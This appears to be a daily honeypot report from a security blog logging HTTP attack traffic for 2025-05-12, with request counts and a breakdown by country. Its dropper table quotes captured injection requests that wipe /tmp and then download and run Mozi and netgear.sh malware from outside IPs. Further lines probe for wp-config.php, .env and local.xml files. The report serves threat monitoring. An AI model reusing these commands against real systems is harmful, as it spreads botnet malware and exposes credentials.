Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-12

·494 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-12
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 42 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1093 requests were recorded during the day, originating from 3 different countries, with a peak of 188 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
CADubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.230.66.11GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.11:11906/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
117.205.81.12427;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
176.65.148.10GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://213.209.143.44/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/&currentsetting.htm=1; HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1911GET /Odin/http/call1747075626 HTTP/1.1
1921GET /OdinHttpCall1747075626 HTTP/1.1
1931GET /odinhttpcall1747075626 HTTP/1.1
2071GET /qa/test HTTP/1.1
2081GET /ci/test HTTP/1.1
2091GET /CP/test HTTP/1.1
2101GET /ad/test HTTP/1.1
2111GET /V1/test HTTP/1.1
2121GET /BU/test HTTP/1.1
2131GET /js/test HTTP/1.1
2141GET /st/test HTTP/1.1
2151GET /Cp/test HTTP/1.1
2161GET /bu/test HTTP/1.1
2171GET /a/test HTTP/1.1
2181GET /s/test HTTP/1.1
2191GET /m/test HTTP/1.1
2251GET /run/test HTTP/1.1
2261GET /log/test HTTP/1.1
2271GET /tmp/test HTTP/1.1
2281GET /Lib/test HTTP/1.1
2291GET /old/test HTTP/1.1
2301GET /v3/test HTTP/1.1
2311GET /v2/test HTTP/1.1
2321GET /v1/test HTTP/1.1
2331GET /ui/test HTTP/1.1
2341GET /fm/test HTTP/1.1
2351GET /cp/test HTTP/1.1
2361GET /wp/test HTTP/1.1
2371GET /en/test HTTP/1.1
2381GET /V2/test HTTP/1.1
2491GET /Upa7 HTTP/1.1
2501GET /faHM HTTP/1.1
2551GET /config/index?time=1747055289750012805 HTTP/1.1
2851POST /api/user/binLookup?time=1747055490748327575 HTTP/1.1
2861GET /api/bin/440393?time=1747055490103060994 HTTP/1.1
2911GET /Odin/http/call1747015081 HTTP/1.1
2921GET /OdinHttpCall1747015081 HTTP/1.1
2931GET /odinhttpcall1747015081 HTTP/1.1
3961GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1
3971GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1
3981GET /app/etc/local.xml HTTP/1.1
4071GET /blog1/.env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0188US
1127BD
2123GB
3112VN
481DE
562CH
649BG
747PL
841NL
929CA
1026AO
1125SC
1225LT
1317SG
1416KR
1515UA
1612AZ
1712IN
1811GH
1910BR
209CN
218ES
226HK
236RU
245BE
255PT
264LA
273AR
283TH
292VE
302JP
312ZM
322MD
332RO
342MC
351IT
361FR
371IL
381ID

Related

Report: 2025-05-11
·1570 words
Repport Daily
Report: 2025-05-10
·420 words
Repport Daily
Report: 2025-05-09
·311 words
Repport Daily